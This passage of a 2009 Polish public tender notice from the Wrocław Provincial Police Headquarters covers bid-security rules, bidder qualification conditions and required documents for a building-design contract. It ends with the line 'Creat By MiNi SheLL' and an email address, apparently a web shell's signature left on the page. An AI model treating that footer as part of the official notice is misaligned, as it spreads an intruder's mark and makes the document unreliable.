1.8.1.1.	upłynie termin związania ofertą,
1.8.1.2.	zawarta zostanie umowa i wniesione zostanie zabezpieczenie należytego wykonania umowy,
1.8.1.3.	zamawiający unieważni postępowanie o udzielenie zamówienia, a protesty zostaną ostatecznie rozstrzygnięte lub upłynie termin do ich wnoszenia. 
1.8.2.	Zgodnie z art. 46 ust. 2 ustawy, zamawiający zwróci niezwłocznie  wadium na wniosek wykonawcy:
1.8.2.1.	który wycofa ofertę przed upływem terminu składania ofert,
1.8.2.2.	który zostanie wykluczony z postępowania,
1.8.2.3.	którego oferta została odrzucona.
1.9.	W myśl art. 46 ust 4a ustawy zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym  mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
1.10.	Zgodnie z art. 46 ust. 5 ustawy zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca, którego oferta zostanie wybrana:
1.10.1.	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
1.10.2.	nie wniesie wymaganego zabezpieczenia należytego wykonania umowy,
1.10.3.	zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe z przyczyn leżących po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają poniższe warunki:              
1.1.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
1.2.	Posiadają niezbędną  wiedzę i doświadczenie oraz dysponują  potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, to jest: 
1.2.1.	Dysponują projektantami posiadającymi odpowiednie doświadczenie zawodowe i uprawnienia budowlane do projektowania bez ograniczeń w następujących specjalnościach: 
1.2.1.1.	architektonicznej; 
1.2.1.2.	konstrukcyjno - budowlanej;
1.2.1.3.	instalacyjnej, w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych;
1.2.1.4.	instalacyjnej, w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;
1.2.1.5.	wskazani projektanci przynależą do odpowiednich Izb samorządu zawodowego (właściwych terytorialnie Okręgowych Izb Architektów lub Okręgowych Izb Inżynierów Budownictwa) oraz posiadają aktualne zaświadczenie o obowiązkowym ubezpieczeniu od odpowiedzialności cywilnej z tytułu wykonywanego zawodu.
1.2.2.	Wykonali w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, co najmniej 2 usługi odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, tzn. wykonanie 2 dokumentacji projektowo-kosztorysowych na cele budowy, przebudowy bądź remontu obiektów użyteczności publicznej przy wartości każdej z dokumentacji  minimum 30 000,00 zł brutto; z załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie. 
1.3.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.  
1.4.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity: Dz. U. 2007 r. Nr 223 poz. 1655 ze zm.: Dz. U. z 2008 r. Nr 171, poz. 1058; Dz. U. Nr 220, poz. 1420).
2.	Ocena spełniania warunków udziału w postępowaniu.
2.1.	Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie złożonych wraz z ofertą oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu. Ocena spełnienia warunków udziału w postępowaniu wymaganych od Wykonawców zostanie dokonana według reguły: spełnia - nie spełnia.
2.2.	Złożenie przez wykonawcę nieprawdziwych informacji mających wpływ na wynik prowadzonego postępowania, brak oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków, nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą - skutkować będzie wykluczeniem wykonawcy z udziału w prowadzonym postępowaniu na podstawie art. 24 ust. 2 punkty 2 i 3, z zastrzeżeniem art. 26 ust. 3 ustawy, bądź ust. 4 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A.	W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, zamawiający na podstawie art. 26 ust. 2 i 44 ustawy oraz § 1 ust. 1 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2006 r. Nr 87 poz. 605) żąda od wykonawcy złożenia wraz z ofertą następujących dokumentów i oświadczeń:
A.1.	Aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
A.2.	Aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 do pkt 8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
A.3.	Aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (dot. podmiotów zbiorowych);
A.4.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa: 
A.4.1.	w punktach A.1. i A.3. -  składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
A.4.1.1.	nie otwarto jego likwidacji ani nie ogłoszono upadłości;
A.4.1.2.	nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
A.4.2.	w punkcie A.2. - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 punkty 4-8 ustawy.
A.4.3.	dokumenty, o których mowa w punkcie A.4. w podpunkcie A.4.1.1. i A.4.1.2. oraz w podpunkcie A.4.2. powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
A.4.4.	jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w podpunktach A.4.1. i A.4.2., zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju , w którym wykonawca ma siedzibę lub miejsce zamieszkania. Postanowienia podpunktu A.4.3. stosuje się odpowiednio.
A.5.	Oświadczenie wykonawcy potwierdzające spełnianie warunków udziału w niniejszym postępowaniu, według wzoru określonego w załączniku nr 3 do SIWZ. 
Uwaga. Dokumenty wymienione w punktach A.1. - A.4. mogą być przedstawione albo w formie oryginału, albo kopii poświadczonej za zgodność z oryginałem przez wykonawcę. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.
B.	W celu potwierdzenia opisanego przez zamawiającego warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, zamawiający żąda następujących dokumentów: 
B.1.	Wykazu osób i podmiotów które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności (załącznik nr 5 do SIWZ). 
B.2.	Dokumentów stwierdzających, że osoby, które będą uczestniczyć w wykonywaniu zamówienia (wymienione w wykazie, o którym mowa w pkt B.1.) posiadają uprawnienia budowlane określone w pkt 1.2.1. w rozdziale 8 SIWZ oraz aktualne dokumenty stwierdzające przynależność tych osób do Okręgowej Izby Inżynierów i Techników Budowlanych lub Okręgowej Izby Architektów wraz z aktualnym zaświadczeniem o obowiązkowym ubezpieczeniu od odpowiedzialności cywilnej z tytułu wykonywanego zawodu. 
B.3.	Wykazu wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, przy uwzględnieniu warunku określonego w pkt 1.2.2. w rozdziale 8 SIWZ, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorów oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie (załącznik nr 6 do SIWZ),
B.4.	Dla każdej wykonanej usługi, przedstawionej w wykazie, o którym mowa w pkt B.3., dokumentów (referencji) potwierdzających, że wymienione usługi zostały wykonane należycie. Oznaczenie dokumentów winno jednoznacznie wskazywać, którego zadania dotyczą. Dokumenty te mogą być przedstawione albo w formie oryginału, albo kopii poświadczonej za zgodność z oryginałem przez wykonawcę. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.
C.	Pozostałe oświadczenia i dokumenty składane wraz z ofertą:
C.1.	Podpisany  szczegółowy opis przedmiotu zamówienia według wzorca określonego w załączniku nr 1 do SIWZ.
C.2.	Wypełniony i podpisany formularz ofertowy wg wzorca określonego w załączniku nr 1A do SIWZ.
C.3.	Podpisane oświadczenie wykonawcy potwierdzające spełnianie warunków określonych dla realizacji  zamówienia według wzorca określonego w załączniku nr 2 do SIWZ.
C.4.	Jeśli wykonawca zamierza powierzyć podwykonawcom wykonanie określonych części zamówienia, to wówczas wykonawca ma obowiązek złożyć wraz z ofertą oświadczenie o udziale podwykonawców według wzorca określonego w załączniku nr 4 do SIWZ.
C.5.	W przypadku wykonawcy będącego spółką cywilną wykonawca ma obowiązek złożyć wraz z ofertą:
C.5.1.	zaświadczenia o wpisie do ewidencji działalności gospodarczej każdego ze wspólników (przedsiębiorców) spółki cywilnej, oraz 
C.5.2.	dokumenty przetargowe, w tym formularz ofertowy - podpisane przez wszystkich wspólników (przedsiębiorców) spółki cywilnej, albo 
C.5.3.	dokumenty przetargowe, w tym formularz ofertowy - podpisane przez osoby wymienione w pełnomocnictwie oraz pełnomocnictwo do reprezentowania spółki cywilnej złożone w formie pisemnej (oryginał) albo odpis pełnomocnictwa notarialnie poświadczony za zgodność z oryginałem - podpisane przez wszystkich  wspólników (przedsiębiorców) spółki cywilnej, albo 
C.5.4.	dokumenty przetargowe, w tym formularz ofertowy - podpisane przez wspólnika albo przez niektórych wspólników (przedsiębiorców) spółki cywilnej, w zależności od tego, jak reprezentację spółki w przedmiotowym zakresie reguluje umowa spółki; w takim przypadku wykonawca ma obowiązek złożyć wraz z ofertą i dokumentami przetargowymi odpis umowy spółki cywilnej poświadczony notarialnie za zgodność z oryginałem. 
D.	Wykonawcy ubiegający się wspólnie o udzielenie zamówienia (konsorcjum):
D.1.	W przypadku gdy wykonawcy na podstawie art. 23 ust. 1 ustawy ubiegają się wspólnie o udzielenie zamówienia (konsorcjum), to z art. 23 ust. 2 ustawy wynika obowiązek ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu o udzielenie zamówienia i zawarcia umowy w sprawie zamówienia publicznego. W związku z powyższym niezbędne jest przedłożenie w ofercie pełnomocnictwa ustanawiającego podmiot uprawniony do występowania w imieniu grupy wykonawców (lidera), określającego zakres tegoż pełnomocnictwa (do reprezentowania ich w prowadzonym postępowaniu o udzielenie zamówienia lub do reprezentowania ich w postępowaniu o udzielenie zamówienia i zawarcia umowy w sprawie zamówienia publicznego), podpisanego przez prawnie upoważnionych przedstawicieli każdego z partnerów. Pełnomocnictwo ma być przedstawione w formie oryginału bądź kopii tego pełnomocnictwa poświadczonej za zgodność z oryginałem przez notariusza. 
D.2.	W przypadku podpisywania oferty przez osobę nie wymienioną w dokumentach rejestrowych firmy, niezbędne jest dołączenie do oferty pełnomocnictwa dla osoby działającej w imieniu wykonawcy. Pełnomocnictwo w sposób jednoznaczny winno określać, do jakich czynności upoważniona jest osoba podpisująca ofertę. Pełnomocnictwo winno być przedstawione w formie oryginału bądź kopii poświadczonej za zgodność z oryginałem przez notariusza. 
D.3.	Wszystkie dokumenty, oświadczenia i informacje składane są wspólnie przez partnerów, z wyjątkiem dokumentów określonych w punktach 1-3 w punkcie A, które są składane przez każdego z partnerów osobno. 
D.4.	Zamawiający, w przypadku wybrania oferty złożonej przez wykonawców ubiegających się wspólnie, zażąda przedstawienia umowy regulującej współpracę tych wykonawców przed zawarciem umowy w sprawie zamówienia publicznego. Zgodnie z art. 141 ustawy wykonawcy ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.dolnoslaska.policja.gov.pl/przetargi/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka Policji we Wrocławiu 
Adres: ul. Podwale 31-33, 50-035 Wrocław
Telefon: (071) 340-39-73, 340-38-00, 340-39-78; faks: (071) 782-41-71, (071) 340 48 87.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.03.2009 godzina 12:00, miejsce: Komenda Wojewódzka Policji we Wrocławiu 
Adres: ul. Podwale 31-33, 50-035 Wrocław
Wydział Zamówień Publicznych i Funduszy Pomocowych
Telefon: (071) 3403973, 3403800, 3403978; faks: (071) 7824171.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com